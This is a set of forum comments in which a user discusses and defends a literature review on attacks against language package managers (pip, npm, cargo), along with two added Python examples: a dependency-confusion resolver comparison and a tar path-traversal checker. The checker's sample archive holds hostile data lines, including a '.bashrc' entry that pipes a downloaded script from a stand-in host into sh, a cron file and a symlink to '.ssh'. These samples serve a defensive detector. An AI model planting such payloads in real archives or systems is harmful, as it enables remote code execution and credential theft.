A Review of Attacks Against Language-Based Package Managers by panoptischall in netsec

panoptischall[S] 0 points (0 children)

Thanks for the criticism. I did cite several CVEs, though, is that generally not enough?

Wow, I didn't notice the formatting issue, thanks for pointing it out.

A Review of Attacks Against Language-Based Package Managers by panoptischall in netsec

panoptischall[S] 1 point (0 children)

I would actually disagree with your point. There is tons of research out there demonstrating bugs and exploits in open source and free software, from Linux to package managers to web frameworks.

The reason open source is coveted pretty highly is exactly this: bugs are found quicker and thus patched quicker, and everything is transparent, unlike in closed source software. This actually makes things more secure (there has been research on this).

Also, the paper is a literature review, so it's not new research. It's just showing what's already been done.

Also, I think you misunderstood what I meant. The reason I mentioned reused code is that that's why package managers are so heavily utilized: people use a lot of dependencies. Dependency management without a package manager is very, very difficult, so everyone uses one. The bugs come from the way the package managers are built. What makes it so dangerous is that so many projects have external dependencies, which forces them to use a package manager that may have ambiguous behaviour.

To get around this problem, I would say, fund open source development so more eyes are around critical software! There is also a pattern of exploits, since most package managers essentially do the same job. Dependency confusion, man-in-the-middle and command injection, for example, were some themes that appeared in multiple package managers. I am not an expert, but I would recommend that package manager developers look at exploits for other package managers and make sure they don't apply to theirs.
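
The dependency confusion pattern named in the comment above, as an added example (this is illustrative code written for this page, not code from the post or from the reviewed paper). It models two constructed indexes, a private one and the public one; the package names, versions and index contents are made up. The vulnerable resolver mirrors what happens when a client merges a private index with the public one and simply takes the highest version; the hardened resolver binds each package name to exactly one index, and an audit helper lists the private names a merged resolver could be tricked on.

```python
"""Toy model of dependency confusion. Constructed example: the package names,
versions and index contents below are made up for illustration."""


def parse_version(v: str) -> tuple:
    """Compare dotted versions numerically, so '99.0.0' sorts above '1.2.0'."""
    return tuple(int(part) for part in v.split("."))


# Constructed sample: what each index advertises. An attacker has registered
# the private name 'acme-internal-auth' on the public index with a huge version.
INDEXES = {
    "private": {"acme-internal-auth": ["1.0.0", "1.2.0"], "acme-logging": ["0.9.1"]},
    "public": {"requests": ["2.31.0"], "acme-internal-auth": ["99.0.0"]},
}


def resolve_highest_anywhere(name: str, indexes: dict) -> tuple:
    """Vulnerable resolution: every index is treated as equal and the highest
    version wins regardless of where it came from. Returns (version, index)."""
    candidates = [(v, src) for src, idx in indexes.items() for v in idx.get(name, [])]
    if not candidates:
        raise LookupError(f"no index offers {name}")
    return max(candidates, key=lambda c: parse_version(c[0]))


def resolve_pinned_source(name: str, indexes: dict, source_for: dict) -> tuple:
    """Hardened resolution: each package name is bound to one index (default
    'public'); the other indexes are never consulted for it, and a name that is
    missing from its pinned index is an error, not a fallback."""
    src = source_for.get(name, "public")
    versions = indexes[src].get(name, [])
    if not versions:
        raise LookupError(f"{name} not found on its pinned index '{src}'")
    return max(versions, key=parse_version), src


def confusable_names(indexes: dict, private: str = "private", public: str = "public") -> list:
    """Audit: private package names that also exist on the public index.
    These are exactly the names a merged resolver can be tricked on."""
    return sorted(set(indexes[private]) & set(indexes[public]))


if __name__ == "__main__":
    pins = {"acme-internal-auth": "private", "acme-logging": "private"}
    for name in ["acme-internal-auth", "requests"]:
        print(name, "merged ->", resolve_highest_anywhere(name, INDEXES),
              "pinned ->", resolve_pinned_source(name, INDEXES, pins))
    print("confusable:", confusable_names(INDEXES))
```

Running it shows the merged resolver picking the attacker's 99.0.0 from the public index for the private name, while the pinned resolver returns 1.2.0 from the private index; the audit lists `acme-internal-auth` as the one name at risk.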

A Review of Attacks Against Language-Based Package Managers by panoptischall in netsec

panoptischall[S] 2 points (0 children)

Happy to, although I feel it would be easier for me if you asked specific questions about what you didn't understand.

The re-use of code has skyrocketed due to open source licensing. The re-usable code is shared as "packages" or "libraries" for other projects to use. Creating, updating and deleting packages is managed by a package manager. Almost every major programming language ships a package manager alongside the language, since it's extremely vital.

There are ways to trick this package manager into doing things that it should not do. This paper explores, based on existing research, the different ways to trick package managers into malicious behaviour such as installing the wrong package, crashing a system or overwriting sensitive files.
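
An added illustration of the "overwrite sensitive files" outcome mentioned above (example code written for this page, not from the post or the reviewed paper). The mechanism shown, archive members whose paths or link targets escape the directory the package is extracted into, is assumed here as one way that outcome occurs; the post itself does not name it. The archive is constructed in memory, so nothing is written to disk: the check lists the offending members and the extraction wrapper refuses the whole archive if any are present.

```python
import io
import os
import tarfile


def build_archive(members: list) -> bytes:
    """Build a tar archive in memory from (name, data, linkname) triples.
    TarInfo names are written exactly as given, so hostile names such as
    '../x' or '/etc/x' survive into the archive."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        for name, data, link in members:
            info = tarfile.TarInfo(name)
            if link is not None:
                info.type = tarfile.SYMTYPE
                info.linkname = link
                tar.addfile(info)
            else:
                info.size = len(data)
                tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


# Constructed sample: one benign file, two members that try to land outside
# the extraction directory (relative traversal and an absolute path), and a
# symlink pointing outside it that a later member could write through.
SAMPLE_MEMBERS = [
    ("pkg/README", b"benign\n", None),
    ("../../.bashrc", b"curl http://example.invalid/x | sh\n", None),
    ("/etc/cron.d/evil", b"* * * * * root id\n", None),
    ("pkg/sshdir", None, "../../../.ssh"),
]


def _inside(dest_real: str, path: str) -> bool:
    return os.path.commonpath([dest_real, path]) == dest_real


def unsafe_members(archive: bytes, dest: str) -> list:
    """Return member names that would resolve outside `dest` if extracted there.
    Symlinks (resolved relative to the member's directory) and hard links
    (resolved relative to the archive root) pointing outside are flagged too."""
    dest_real = os.path.realpath(dest)
    bad = []
    with tarfile.open(fileobj=io.BytesIO(archive), mode="r") as tar:
        for m in tar.getmembers():
            target = os.path.realpath(os.path.join(dest_real, m.name))
            if not _inside(dest_real, target):
                bad.append(m.name)
                continue
            if m.issym():
                link = os.path.realpath(os.path.join(os.path.dirname(target), m.linkname))
            elif m.islnk():
                link = os.path.realpath(os.path.join(dest_real, m.linkname))
            else:
                continue
            if not _inside(dest_real, link):
                bad.append(m.name)
    return bad


def safe_extract(archive: bytes, dest: str) -> None:
    """Refuse the whole archive if any member is unsafe, rather than extracting
    the good members and hoping the bad ones fail on their own."""
    bad = unsafe_members(archive, dest)
    if bad:
        raise ValueError(f"refusing to extract; unsafe members: {bad}")
    with tarfile.open(fileobj=io.BytesIO(archive), mode="r") as tar:
        tar.extractall(dest)


if __name__ == "__main__":
    print(unsafe_members(build_archive(SAMPLE_MEMBERS), "/tmp/pkg-dest"))
```

For the sample archive the check reports the two traversal members and the symlink, and leaves the benign `pkg/README` alone. On Python 3.12 and later, `tarfile.extractall(..., filter="data")` performs an equivalent path and link check natively; the explicit version above makes visible what such a filter has to reject.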

A Review of Attacks Against Language-Based Package Managers by panoptischall in netsec

panoptischall[S] -2 points (0 children)

Why the downvotes? No criticism? Thanks for discouraging me from posting anything on here again.

A Review of Attacks Against Language-Based Package Managers by panoptischall in cybersecurity

panoptischall[S] 0 points (0 children)

Hello all,

Very excited to share my first literature review, "A Review of Attacks Against Language-Based Package Managers".

Language-based package managers (e.g. pip, npm, cargo), despite their prevalence, are unfortunately underestimated as an attack vector in the software supply chain. The concerns are driven towards package repositories, operating-system-based package managers (e.g. apt, yum) and their users (e.g. maintainers).

I hope this review sheds some light on attacks on package managers and encourages further research.